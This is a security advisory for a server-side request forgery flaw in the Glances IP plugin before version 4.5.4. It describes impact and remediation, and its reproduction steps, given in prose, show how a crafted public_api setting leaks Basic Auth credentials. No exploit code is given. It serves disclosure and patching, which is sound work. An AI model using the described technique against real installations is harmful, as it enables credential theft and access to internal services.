Glances Server-Side Request Forgery Vulnerability in IP Plugin Allows Credential Leakage

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Glances IP plugin, prior to version 4.5.4. The issue arises from inadequate validation of the public_api configuration parameter, which is used in outbound HTTP requests without proper scheme or hostname/IP validation. This vulnerability allows an attacker to manipulate the application into sending requests to arbitrary internal or external endpoints. Furthermore, if public_username and public_password are configured, these credentials are automatically included in the Authorization: Basic header, leading to unauthorized disclosure of sensitive information to attacker-controlled servers. Exploitation of this vulnerability could facilitate access to internal network services, retrieval of sensitive data from cloud metadata endpoints, and exfiltration of credentials via outbound HTTP requests.

Impact

Exploitation of this vulnerability allows for unauthorized outbound HTTP requests, controlled by the attacker through the public_api parameter. This could lead to SSRF attacks, accessing internal services, querying cloud metadata for sensitive information, and injecting manipulated data into the Glances application via intercepted responses.

Reproduction

To reproduce this vulnerability, create a malicious Glances configuration file that includes a crafted public_api URL pointing to a local listener. Once Glances is started with this configuration, it will send a request to the specified URL, including any set Basic Authentication credentials. This demonstrates the SSRF vulnerability by accessing the local listener and exposing the injected credentials.

Remediation

Users should update Glances to version 4.5.4 or later, where this vulnerability has been patched.